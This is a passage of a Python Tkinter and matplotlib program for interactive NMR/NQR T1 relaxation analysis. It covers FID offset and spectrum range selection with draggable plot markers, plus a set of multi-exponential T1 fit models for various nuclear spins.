self.label_mean = tk.Label(self.frame_left3_middle, text='Selected range:')
self.label_mean.pack(side='left')
self.entry_mean_var = tk.StringVar(self, value=self.range)
self.entry_mean = ttk.Entry(self.frame_left3_middle,
textvariable=self.entry_mean_var, width=3)
self.entry_mean.pack(side='left')
#plot 3
self.fig_right1 = plt.figure(dpi=100, figsize=(7,3.5))
self.fig_right1.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
self.canvas_right1._tkcanvas.pack()
#plot 4
self.fig_right2 = plt.figure(dpi=100, figsize=(7,3.5))
self.fig_right2.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
self.canvas_right2._tkcanvas.pack()
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_right, text='Confirm', command=self.Finish)
self.button_confirm.pack(side='top', anchor='ne')
def Fill_plots(self, temp_list, temp_list2, temp_set, tau_list, t1_list, phase_list, shl_list):
'''Puts the contents into the plot fields'''
#starting values
self.mean_t1 = np.mean(t1_list[self.range:])
self.mean_phase = np.mean(np.unwrap(phase_list[self.range:]))
self.mean_shl = np.round(np.mean(shl_list[self.range:]))
#x axes
n = len(tau_list)
x_list = np.linspace(1,n,n)
#plot 1, temperature stabillity
self.axes_left1 = self.fig_left1.add_subplot(111)
if abs(np.mean(temp_list) - temp_set) < 2:
self.axes_left1.plot(x_list, temp_list, marker='.', color=colors[1], label='ITC_R1')
if abs(np.mean(temp_list2) - temp_set) < 2:
self.axes_left1.plot(x_list, temp_list2, marker='.', color=colors[2], label='ITC_R2')
self.axes_left1.axhline(y=temp_set, color=colors[0], label='Set T')
self.axes_left1.margins(0.02, 0.1)
self.axes_left1.set_title('Temperature stabillity check')
self.axes_left1.set_xlabel('File index')
self.axes_left1.set_ylabel('Temperature (K)')
self.axes_left1.legend(loc='upper right')
self.axes_left1.grid()
#plot 2 quick T1 points
self.axes_left2 = self.fig_left2.add_subplot(111)
self.axes_left2.plot(tau_list, t1_list, 'bo', color=colors[1], label='Data')
self.axes_left2_vline = self.axes_left2.axvline(x=tau_list[self.range],
color=colors[2], label='Select')
self.axes_left2_hline = self.axes_left2.axhline(y=self.mean_t1, color=colors[0],
label='Plato')
self.axes_left2.set_xscale('log')
self.axes_left2.set_title('T1 quick check')
self.axes_left2.set_xlabel(r'$\tau$ ($\mu$s)')
self.axes_left2.set_ylabel('Signal')
#legend = self.axes_left2.legend(loc='lower right')
#legend.draggable()
self.axes_left2.grid()
#plot 3 quick phases
self.axes_right1 = self.fig_right1.add_subplot(111)
self.axes_right1.plot(x_list, np.unwrap(np.array(phase_list))*180/np.pi, marker='.',
color=colors[1], label='Phase')
self.axes_right1_hline = self.axes_right1.axhline(self.mean_phase*180/np.pi, color=colors[0], label='Mean phase')
self.axes_right1.margins(0.02, 0.1)
self.axes_right1.set_title('Phase check')
self.axes_right1.set_xlabel('File index')
self.axes_right1.set_ylabel('Phase (Deg)')
#self.axes_right1.legend(loc='lower right')
self.axes_right1.grid()
#plot 4 quick shl
self.axes_right2 = self.fig_right2.add_subplot(111)
self.axes_right2.plot(x_list, shl_list, marker='.',
color=colors[1], label='SHL')
self.axes_right2_hline = self.axes_right2.axhline(self.mean_shl,
color=colors[0], label='Mean SHL')
self.axes_right2.margins(0.02, 0.1)
self.axes_right2.set_title('SHL check')
self.axes_right2.set_xlabel('File index')
self.axes_right2.set_ylabel('Shift left')
#self.axes_right2.legend(loc='lower right')
self.axes_right2.grid()
#redraw canvases
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
#draggable vline event
def Drag(event):
'''Allows dragging of the marker in left2, recalculates mean of selected points'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.range = np.searchsorted(tau_list, event.xdata, side='right')
self.mean_t1 = np.mean(t1_list[self.range:])
self.mean_phase = np.mean(np.unwrap(phase_list[self.range:]))
self.mean_shl = np.round(np.mean(shl_list[self.range:]))
self.entry_mean_var.set(self.range)
#update plot
self.axes_left2_vline.set_xdata(event.xdata)
self.axes_left2_hline.set_ydata(self.mean_t1)
self.axes_right1_hline.set_ydata(self.mean_phase*180/np.pi)
self.axes_right2_hline.set_ydata(self.mean_shl)
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
class Frame_plot_T1_ranges(tk.Frame):
'''Pioneer first T1 preview plot'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent, bd=5)
self.pack(side='left', fill='both', expand=True)
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
self.offset_select = self.parent.temperatures.previous_t1['offset'][0]
self.range_l_select = self.parent.temperatures.previous_t1['integral_range'][0]
self.range_r_select = self.parent.temperatures.previous_t1['integral_range'][1]
self.mirroring = self.parent.temperatures.previous_t1['mirroring']
self.shl_select = self.trace.mean_shl
#load widgets
self.Widgets()
#load plots and read
self.Choose_offset(trace)
self.focus()
#global key bindings
root.bind('<Left>', self.Previous)
root.bind('<Right>', self.Confirm_offset)
def Widgets(self):
'''Builds all the subframes and canvases'''
def Set_offset(event=None):
'''Entry change of offset, replot and write value'''
try:
self.offset_select = int(self.entry_offset.get())
#update plot
self.axes_left1_vline.set_xdata(self.offset_select)
self.axes_left2_vline.set_xdata(self.offset_select)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted values must be integers!')
def Set_range(event=None):
'''Entry change of ranges, replot and save value'''
try:
self.range_l_select = int(self.entry_range_l_var.get())
self.range_r_select = int(self.entry_range_r_var.get())
self.axes_right1_vline_l.set_xdata(self.spc_fr[self.range_l_select])
self.axes_right2_vline_l.set_xdata(self.spc_fr[self.range_l_select])
self.axes_right1_vline_r.set_xdata(self.spc_fr[self.range_r_select])
self.axes_right2_vline_r.set_xdata(self.spc_fr[self.range_r_select])
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted values must be integers!')
def Set_shl(event=None):
'''Entry change of shl, replot and write value'''
try:
self.shl = int(self.entry_shl.get())
#update plot
self.axes_left1_vline_shl.set_xdata(self.shl)
self.axes_left2_vline_shl.set_xdata(self.shl)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted values must be integers!')
#split in two half frames
self.frame_left = tk.Frame(self)
self.frame_right = tk.Frame(self)
self.frame_left.pack(side='left', fill='y')
self.frame_right.pack(side='left', fill='y')
#add frames on left side
self.frame_left1 = tk.Frame(self.frame_left, bd=5)
self.frame_left2 = tk.Frame(self.frame_left, bd=5)
self.frame_left3 = tk.Frame(self.frame_left, bd=5)
self.frame_left1.pack(side='top')
self.frame_left2.pack(side='top')
self.frame_left3.pack(side='top', fill='x')
#add frames on right side
self.frame_right1 = tk.Frame(self.frame_right, bd=5)
self.frame_right2 = tk.Frame(self.frame_right, bd=5)
self.frame_right3 = tk.Frame(self.frame_right, bd=5)
self.frame_right1.pack(side='top')
self.frame_right2.pack(side='top')
self.frame_right3.pack(side='top', fill='x')
#add canvases and toolbars
#plot 1
self.fig_left1 = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_left1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
self.canvas_left1._tkcanvas.pack()
#plot 2
self.fig_left2 = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_left2.subplots_adjust(bottom=0.12, left= 0.10, right=0.96, top=0.93)
self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
self.canvas_left2._tkcanvas.pack()
#buttons left
self.button_previous = ttk.Button(self.frame_left3, text='Repeat previous', command=self.Previous)
self.button_previous.pack(side='left')
self.button_confirm = ttk.Button(self.frame_left3, text='Confirm', command=self.Confirm_offset)
self.button_confirm.pack(side='right')
#check button for mirroring fid
self.check_mirroring_var = tk.BooleanVar(self, False)
if self.mirroring:
self.check_mirroring_var.set(True)
self.check_mirroring = (ttk.Checkbutton(self.frame_left3, variable=self.check_mirroring_var))
self.check_mirroring.pack(side='right')
self.label_mirroring = tk.Label(self.frame_left3, text='Mirroring')
self.label_mirroring.pack(side='right')
#middle frame
self.frame_left3_middle = tk.Frame(self.frame_left3)
self.frame_left3_middle.pack(anchor='center')
self.label_offset = tk.Label(self.frame_left3_middle, text='Selected offset:')
self.label_offset.pack(side='left')
self.entry_offset_var = tk.StringVar(self, value=self.offset_select)
self.entry_offset = ttk.Entry(self.frame_left3_middle,
textvariable=self.entry_offset_var, width=5)
self.entry_offset.pack(side='left')
self.entry_offset.bind('<Return>', Set_offset)
self.button_set_offset = ttk.Button(self.frame_left3_middle,
text='Set offset', command=Set_offset)
self.button_set_offset.pack(side='left')
self.label_shl = tk.Label(self.frame_left3_middle, text='Selected shl:')
self.label_shl.pack(side='left')
self.entry_shl_var = tk.StringVar(self, value=self.shl_select)
self.entry_shl = ttk.Entry(self.frame_left3_middle,
textvariable=self.entry_shl_var, width=5)
self.entry_shl.pack(side='left')
self.entry_shl.bind('<Return>', Set_shl)
self.button_set_shl = ttk.Button(self.frame_left3_middle,
text='Set shl', command=Set_shl)
self.button_set_shl.pack(side='left')
#plot 3
self.fig_right1 = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_right1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
self.canvas_right1._tkcanvas.pack()
#plot 4
self.fig_right2 = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_right2.subplots_adjust(bottom=0.12, left= 0.10, right=0.96, top=0.93)
self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
self.canvas_right2._tkcanvas.pack()
#buttons right
self.label_range = tk.Label(self.frame_right3, text='Selected ranges:')
self.label_range.pack(side='left')
self.entry_range_l_var = tk.StringVar(self, value=self.range_l_select)
self.entry_range_l = ttk.Entry(self.frame_right3,
textvariable=self.entry_range_l_var, width=5)
self.entry_range_l.pack(side='left')
self.entry_range_l.bind('<Return>', Set_range)
self.label_range_comma = tk.Label(self.frame_right3, text=' , ')
self.label_range_comma.pack(side='left')
self.entry_range_r_var = tk.StringVar(self, value=self.range_r_select)
self.entry_range_r = ttk.Entry(self.frame_right3,
textvariable=self.entry_range_r_var, width=5)
self.entry_range_r.pack(side='left')
self.entry_range_r.bind('<Return>', Set_range)
self.button_set_range = ttk.Button(self.frame_right3, text='Set range', command=Set_range)
self.button_set_range.pack(side='left')
self.button_close = ttk.Button(self.frame_right3, text='Confirm',
command=self.Close, state='disabled')
self.button_close.pack(side='right')
#button commands
def Previous(self, event=None):
'''Back to the previous step!'''
#reload offset
self.parent.plot_t1_quick.pack(side='left', fill='both', expand=True)
#destroy me
self.pack_forget()
self.destroy()
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
def Confirm_offset(self, event=None):
'''Saves current offset range, shl and opens integral ranges select'''
self.trace.offset_range = (self.offset_select, None)
self.trace.mean_shl = self.shl_select
self.parent.temperatures.previous_t1['offset'] = (self.offset_select, None)
#remember mirroring
self.parent.temperatures.previous_t1['mirroring'] = self.check_mirroring_var.get()
self.trace.mirroring = self.check_mirroring_var.get()
#run integral ranges select and clean up buttons
self.Choose_ranges(self.trace)
self.button_confirm.config(state='disabled')
self.button_close.config(state='enabled')
self.button_close.focus_set()
#change global keys
root.bind('<Right>', self.Close)
def Close(self, event=None):
'''Confirm the selection in this screen'''
#save the integral ranges
self.trace.integral_range = (self.range_l_select, self.range_r_select)
self.parent.temperatures.previous_t1['integral_range'] = (self.range_l_select,
self.range_r_select)
#finish the analysis
self.trace.Run()
#unpack and destroy
self.trace.analysed = True
self.parent.plot_t1_quick.destroy()
self.pack_forget()
self.destroy()
plt.close('all')
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
#load the overview frame
self.parent.plot_t1_view = Frame_plot_T1_view(self.parent, self.trace)
#self.parent.plot_t1_view.pack(side='left', fill='both', expand=True)
def Choose_offset(self, trace):
'''Operations and plotting for choosing the FID offsets'''
fids = list()
for file in trace.file_list:
fid = FID(file, trace.file_dir)
fids.append(fid.x)
x_mean = np.mean(fids[slice(*trace.mean_range)], axis=0)
#plot 1
self.axes_left1 = self.fig_left1.add_subplot(111)
self.axes_left1.plot(np.real(x_mean), color=colors[1], label='Re')
self.axes_left1.plot(np.imag(x_mean), color=colors[2], label='Im')
self.axes_left1.plot(np.abs(x_mean), color=colors[0], label='Abs')
self.axes_left1_vline_shl = self.axes_left1.axvline(x=trace.mean_shl, color=colors[-1])
self.axes_left1_vline = self.axes_left1.axvline(x=self.offset_select, color=colors[4])
self.axes_left1.margins(0.02, 0.1)
self.axes_left1.set_title('Mean FID')
self.axes_left1.set_xlabel('Time (index)')
self.axes_left1.set_ylabel('Signal (A.U.)')
#self.axes_left1.legend(loc='upper right')
self.axes_left1.grid()
#plot 2
self.axes_left2 = self.fig_left2.add_subplot(111, sharex=self.axes_left1)
for i, fid in enumerate(fids):
self.axes_left2.plot(np.abs(fid)+np.amax(np.abs(x_mean))*0.5*i,
color=colors[i%9], label=str(i))
self.axes_left2_vline_shl = self.axes_left2.axvline(x=trace.mean_shl, color=colors[-1], label='shl')
self.axes_left2_vline = self.axes_left2.axvline(x=self.offset_select,
color=colors[4], label='Select')
self.axes_left2.margins(0.02, 0.02)
self.axes_left2.set_title('All FIDs')
self.axes_left2.set_xlabel('Time (index)')
self.axes_left2.set_ylabel('Absolute signal (A.U.)')
self.axes_left2.grid()
#draggable vline event
def Drag(event):
'''Allows dragging of the marker in left2, recalculates mean of selected points'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.shl_select = int(event.xdata)
self.entry_shl_var.set(self.shl_select)
#update plot
self.axes_left1_vline_shl.set_xdata(event.xdata)
self.axes_left2_vline_shl.set_xdata(event.xdata)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
if event.button == 3 and event.inaxes != None:
#find the index of selected points
self.offset_select = int(event.xdata)
self.entry_offset_var.set(self.offset_select)
#update plot
self.axes_left1_vline.set_xdata(event.xdata)
self.axes_left2_vline.set_xdata(event.xdata)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
self.axes_left1_vline_drag = self.fig_left1.canvas.mpl_connect('motion_notify_event', Drag)
self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
def Choose_ranges(self, trace):
'''Operations and plotting for choosing spectrum integral ranges'''
spcs = list()
for file in trace.file_list:
fid = FID(file, trace.file_dir)
fid.Offset(trace.offset_range)
fid.Shift_left(trace.mean_shl, mirroring=trace.mirroring)
fid.Fourier()
fid.Phase_rotate(trace.mean_phase)
spcs.append(fid.spc)
spc_fr = fid.spc_fr
self.spc_fr = spc_fr
spc_mean = np.mean(spcs[slice(*trace.mean_range)], axis=0)
#plot 3
self.axes_right1 = self.fig_right1.add_subplot(111)
self.axes_right1.plot(spc_fr, np.real(spc_mean), color=colors[1], label='Re')
self.axes_right1.plot(spc_fr, np.imag(spc_mean), color=colors[2], label='Im')
self.axes_right1.axvline(x=trace.fr, color=colors[-1])
self.axes_right1_vline_l = self.axes_right1.axvline(x=spc_fr[self.range_l_select],
color=colors[4])
self.axes_right1_vline_r = self.axes_right1.axvline(x=spc_fr[self.range_r_select],
color=colors[4])
self.axes_right1.set_xlim((trace.fr -0.5,+ trace.fr +0.5))
self.axes_right1.set_title('Mean spectrum (Drag with left and right mouse button)')
self.axes_right1.set_xlabel('Frequency (MHz)')
self.axes_right1.set_ylabel('Signal (A.U.)')
self.axes_right1.legend(loc='upper left')
self.axes_right1.grid()
#plot 4
self.axes_right2 = self.fig_right2.add_subplot(111)
for i, spc in enumerate(spcs):
self.axes_right2.plot(spc_fr, np.real(spc)+np.amax(np.abs(spc_mean))*0.5*i,
color=colors[i%9], label=str(i))
self.axes_right1.axvline(x=trace.fr, color=colors[-1])
self.axes_right2_vline_l = self.axes_right2.axvline(x=spc_fr[self.range_l_select],
color=colors[4])
self.axes_right2_vline_r = self.axes_right2.axvline(x=spc_fr[self.range_r_select],
color=colors[4])
self.axes_right2.set_xlim((trace.fr -0.5,+ trace.fr +0.5))
self.axes_right2.margins(0.02, 0.02)
self.axes_right2.set_title('All FIDs')
self.axes_right2.set_xlabel('Frequency (MHz)')
self.axes_right2.set_ylabel('Real part of signal (A.U.)')
self.axes_right2.grid()
#draggable vline event
def Drag(event):
'''Allows dragging of the marker in left2, recalculates mean of selected points'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.range_l_select = np.searchsorted(spc_fr, event.xdata, side='left')
self.entry_range_l_var.set(self.range_l_select)
#update plot
self.axes_right1_vline_l.set_xdata(event.xdata)
self.axes_right2_vline_l.set_xdata(event.xdata)
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
if event.button == 3 and event.inaxes != None:
#find the index of selected points
self.range_r_select = np.searchsorted(spc_fr, event.xdata, side='right')
self.entry_range_r_var.set(self.range_r_select)
#update plot
self.axes_right1_vline_r.set_xdata(event.xdata)
self.axes_right2_vline_r.set_xdata(event.xdata)
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
self.axes_right1_vline_drag = self.fig_right1.canvas.mpl_connect('motion_notify_event', Drag)
self.axes_right2_vline_drag = self.fig_right2.canvas.mpl_connect('motion_notify_event', Drag)
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
class Frame_plot_T1_view(tk.Frame):
'''Pioneer first T1 preview plot'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent)
self.pack(side='left', anchor='n')
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
#load widgets
self.Widgets()
#global key bind
root.bind('<Right>', self.Confirm)
def Widgets(self):
'''Builds all the subframes and canvases'''
#button commands
def Disable(event=None):
'''Disables and red-flags the point to avoid plotting'''
#try:
self.trace.disabled = not self.trace.disabled
#except:
# self.trace.disabled = True
self.Refresh_parameters()
def Repeat(event=None):
'''Clears the T1 trace and starts the analysis from scratch'''
self.trace.Reinit()
self.Confirm()
self.trace.analysed = False
#bottom button row
self.frame_bottom = tk.Frame(self)
self.frame_bottom.pack(side='bottom', fill='x')
#split in columns
self.frame_parameters = tk.Frame(self, bd=5)
self.frame_parameters.pack(side='left', anchor='n')
self.frame_plot = tk.Frame(self, bd=5)
self.frame_plot.pack(side='left', anchor='n')
#parameters
self.label_parameters = tk.Label(self.frame_parameters, text='Parameters')
self.label_parameters.pack(side='top')
self.tree_columns = ('Name','Value')
self.tree_parameters = ttk.Treeview(self.frame_parameters, columns=self.tree_columns,
show='headings', selectmode='none', height=25)
self.tree_parameters.pack(side='top',fill='y', expand=True)
#define column widths
self.tree_parameters.column('Name', width=80)
self.tree_parameters.column('Value', width=120)
#define column names
for column in self.tree_columns:
self.tree_parameters.heading(column, text=column)
#display in degrees
self.trace.mean_phase_deg = self.trace.mean_phase*180/np.pi
#fill in params
self.Refresh_parameters()
# disable point button
self.button_disable = ttk.Button(self.frame_parameters, text='Disable/enable Point',
command=Disable, width=20)
self.button_disable.pack(side='top')
#redo analysis button
self.button_repeat = ttk.Button(self.frame_parameters, text='Repeat analysis',
command=Repeat, width=20)
self.button_repeat.pack(side='top')
#T1 plot
self.fig_t1 = plt.figure(dpi=100, figsize=(8,6))
self.fig_t1.subplots_adjust(bottom=0.1, left= 0.10, right=0.96, top=0.94)
self.fig_t1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
#self.fig_t1.text(0.82, 0.97, r'$y_0(1-(1-s) \exp(-(\frac{x}{T_1})^r))$', horizontalalignment='center', verticalalignment='center')
self.canvas_t1 = FigureCanvasTkAgg(self.fig_t1, self.frame_plot)
self.canvas_t1._tkcanvas.pack()
self.Fill_plot()
self.Fitting_frame()
def Fitting_frame(self, event=None):
'''Repacks/initializes the fitting frame for the selected fitting function'''
#repack if existing:
try:
self.frame_fit.destroy()
except:
pass
#fit frame
self.frame_fit = tk.Frame(self, bd=5)
self.frame_fit.pack(side='left', anchor='n', fill='y')
#fit functions
def Fit_exponential(x, T1=0.001, y0=1000, s=1, r=1):
'''T1 exponential fit model'''
return y0*(1-(1+s)*np.exp(-(x/T1)**r))
def Fit_spin_3_2(x, T1=0.001, y0=1000, s=1, r=1):
'''T1 fit model for spin 3/2'''
return y0*(1-(1+s)*(0.1*np.exp(-(x/T1)**r)+0.9*np.exp(-(6*x/T1)**r)))
def Fit_spin_3_2_dbl(x, T11=0.001, T12=0.001, y0=1000, s1=1, s2=1, r=1):
'''T1 fit model for spin 3/2'''
return y0*(1-(1+s1)*(0.1*np.exp(-(x/T11)**r)+0.9*np.exp(-(6*x/T11)**r)) \
-(1+s2)*(0.1*np.exp(-(x/T12)**r)+0.9*np.exp(-(6*x/T12)**r)))
def Fit_spin_3_2_1st(x, T1=0.001, y0=1000, s=1, r=1):
'''T1 fit model for spin 3/2'''
return y0*(1-(1+s)*(0.1*np.exp(-(x/T1)**r)+0.5*np.exp(-(3*x/T1)**r)+0.4*np.exp(-(6*x/T1)**r)))
def Fit_2exponential(x, T11=0.001, T12=0.01, y0=1000, s1=1, s2=1, r=1):
'''T1 two component exponential fit for 1/2 spin'''
return y0*(1 -(1+s1)*np.exp(-(x/T11)**r) -(1+s2)*np.exp(-(x/T12)**r))
def Fit_spin_7_2_TaS2(x, T1=0.001, y0=1000, s=1, r=1):
'''T1 fit model for spin 7/2 on 1/2 - 3/2 transition; NQR'''
return y0*(1-(1+s)*(0.024*np.exp(-(3*x/T1)**r)+0.235*np.exp(-(10*x/T1)**r)+0.741*np.exp(-(21*x/T1)**r)))
def Fit_spin_7_2_TaS2_beta(x, T1=0.001, y0=1000, s=1, r=1):
'''T1 fit model for spin 7/2 on 1/2 - 3/2 transition; NQR'''
return y0*(1-(1+s)*(0.036*np.exp(-(2.91*x/T1)**r)+0.314*np.exp(-(9.30*x/T1)**r)+0.651*np.exp(-(19.1*x/T1)**r)))
def Fit_spin_5_2(x, T1=0.001, y0=1000, s=1, r=1):
'''T1 fit model for spin 5/2 on -1/2 - 1/2 transition; central line'''
return y0*(1-(1+s)*(0.0285714*np.exp(-(1*x/T1)**r)+0.177778*np.exp(-(6*x/T1)**r)+0.793651*np.exp(-(15*x/T1)**r)))
def Fit_spin_5_2_dbl(x, T11=0.001, T12=0.001, y0=1000, s1=1, s2=1, r=1):
'''T1 fit model for spin 5/2 on -1/2 - 1/2 transition; central line'''
return y0*(1-(1+s1)*(0.0285714*np.exp(-(1*x/T11)**r)+0.177778*np.exp(-(6*x/T11)**r)+0.793651*np.exp(-(15*x/T11)**r)) -(1+s2)*(0.0285714*np.exp(-(1*x/T12)**r)+0.177778*np.exp(-(6*x/T12)**r)+0.793651*np.exp(-(15*x/T12)**r)))
def Fit_spin_5_2_1st(x, T1=0.001, y0=1000, s=1, r=1):
'''T1 fit model for spin 5/2 on 1/2 - 3/2 transition; first sattelite'''
return y0*(1-(1+s)*(0.0285714*np.exp(-(1*x/T1)**r)+0.0535714*np.exp(-(3*x/T1)**r)+0.025*np.exp(-(6*x/T1)**r)+0.446429*np.exp(-(10*x/T1)**r)+0.446429*np.exp(-(15*x/T1)**r)))
def Fit_spin_5_2_1st_dbl(x, T11=0.001, T12=0.001, y0=1000, s1=1, s2=1, r=1):
'''T1 fit model for spin 5/2 on 1/2 - 3/2 transition; first sattelite'''
return y0*(1-(1+s1)*(0.0285714*np.exp(-(1*x/T11)**r)+0.0535714*np.exp(-(3*x/T11)**r)+0.025*np.exp(-(6*x/T11)**r)+0.446429*np.exp(-(10*x/T11)**r)+0.446429*np.exp(-(15*x/T11)**r)) -(1+s2)*(0.0285714*np.exp(-(1*x/T12)**r)+0.0535714*np.exp(-(3*x/T12)**r)+0.025*np.exp(-(6*x/T12)**r)+0.446429*np.exp(-(10*x/T12)**r)+0.446429*np.exp(-(15*x/T12)**r)))
def Fit_spin_5_2_2nd(x, T1=0.001, y0=1000, s=1, r=1):
'''T1 fit model for spin 5/2 on 3/2 - 5/2 transition; second sattelite'''
return y0*(1-(1+s)*(0.0285714*np.exp(-(1*x/T1)**r)+0.214286*np.exp(-(3*x/T1)**r)+0.4*np.exp(-(6*x/T1)**r)+0.285714*np.exp(-(10*x/T1)**r)+0.0714286*np.exp(-(15*x/T1)**r)))
def Fit_spin_5_2_2nd_dbl(x, T11=0.001, T12=0.001, y0=1000, s1=1, s2=1, r=1):
'''T1 fit model for spin 5/2 on 3/2 - 5/2 transition; second sattelite'''
return y0*(1-(1+s1)*(0.0285714*np.exp(-(1*x/T11)**r)+0.214286*np.exp(-(3*x/T11)**r)+0.4*np.exp(-(6*x/T11)**r)+0.285714*np.exp(-(10*x/T11)**r)+0.0714286*np.exp(-(15*x/T11)**r)) -(1+s2)*(0.0285714*np.exp(-(1*x/T12)**r)+0.214286*np.exp(-(3*x/T12)**r)+0.4*np.exp(-(6*x/T12)**r)+0.285714*np.exp(-(10*x/T12)**r)+0.0714286*np.exp(-(15*x/T12)**r)))
def Fit_spin_5_2_2nd_tpl(x, T11=0.001, T12=0.001, T13=0.001, y0=1000, s1=1, s2=1, s3=1, r=1):
'''T1 fit model for spin 5/2 on 3/2 - 5/2 transition; second sattelite'''
return y0*(1-(1+s1)*(0.0285714*np.exp(-(1*x/T11)**r)+0.214286*np.exp(-(3*x/T11)**r)+0.4*np.exp(-(6*x/T11)**r)+0.285714*np.exp(-(10*x/T11)**r)+0.0714286*np.exp(-(15*x/T11)**r)) -(1+s2)*(0.0285714*np.exp(-(1*x/T12)**r)+0.214286*np.exp(-(3*x/T12)**r)+0.4*np.exp(-(6*x/T12)**r)+0.285714*np.exp(-(10*x/T12)**r)+0.0714286*np.exp(-(15*x/T12)**r)) -(1+s3)*(0.0285714*np.exp(-(1*x/T13)**r)+0.214286*np.exp(-(3*x/T13)**r)+0.4*np.exp(-(6*x/T13)**r)+0.285714*np.exp(-(10*x/T13)**r)+0.0714286*np.exp(-(15*x/T13)**r)))
#reference to functions
# [function, fit_params, start guess, label, tex_form]
self.fit_names = {'Single Exp':[Fit_exponential, ['T1', 'y0', 's', 'r'],
[self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-self.trace.area_list[0]/self.trace.area_list[-1],
1],
'y0(1-(1+s)exp[-(x/T1)^r])'
],
'Spin 3/2':[Fit_spin_3_2, ['T1', 'y0', 's', 'r'],
[6*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''y0(1-(1+s)(
0.1*exp(-(x/T1)**r)
+0.9*exp(-(6x/T1)**r)))'''
],
'Spin 3/2 double':[Fit_spin_3_2_dbl, ['T11', 'T12', 'y0', 's1', 's2', 'r'],
[6*self.trace.tau_list[self.trace.mean_range[0]-5],
self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-self.trace.area_list[0]/self.trace.area_list[-1],
-self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''y0(1-(1+s)(
0.1*exp(-(x/T1)**r)
+0.9*exp(-(6x/T1)**r)))'''
],
'Spin 3/2 1st':[Fit_spin_3_2_1st, ['T1', 'y0', 's', 'r'],
[6*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''y0(1-(1+s)(
0.1*exp(-(x/T1)**r)
+0.5*exp(-(3x/T1)**r)))
+0.4*exp(-(6x/T1)**r)))'''
],
'Double Exp':[Fit_2exponential, ['T11','T12','y0','s1','s2','r'],
[self.trace.tau_list[self.trace.mean_range[0]-5],
self.trace.tau_list[self.trace.mean_range[0]-5]*10,
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-self.trace.area_list[0]/self.trace.area_list[-1]/2,
self.trace.area_list[0]/self.trace.area_list[-1]*2,
1],
'y0(1-(1+s1)exp[-x/T11]-(1+s2)exp[-x/T12])'
],
'Spin 7/2 TaS2':[Fit_spin_7_2_TaS2, ['T1', 'y0', 's', 'r'],
[21*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
-self.trace.area_list[0]/self.trace.area_list[-1],
1],
'''y0(1-(1+s)(
0.024*exp(-(3x/T1)**r)
+0.235*exp(-(10x/T1)**r)
+0.741*exp(-(21x/T1)**r)))'''
],
'Spin 7/2 TaS2 b':[Fit_spin_7_2_TaS2_beta, ['T1', 'y0', 's', 'r'],
[19*self.trace.tau_list[self.trace.mean_range[0]-5],
np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
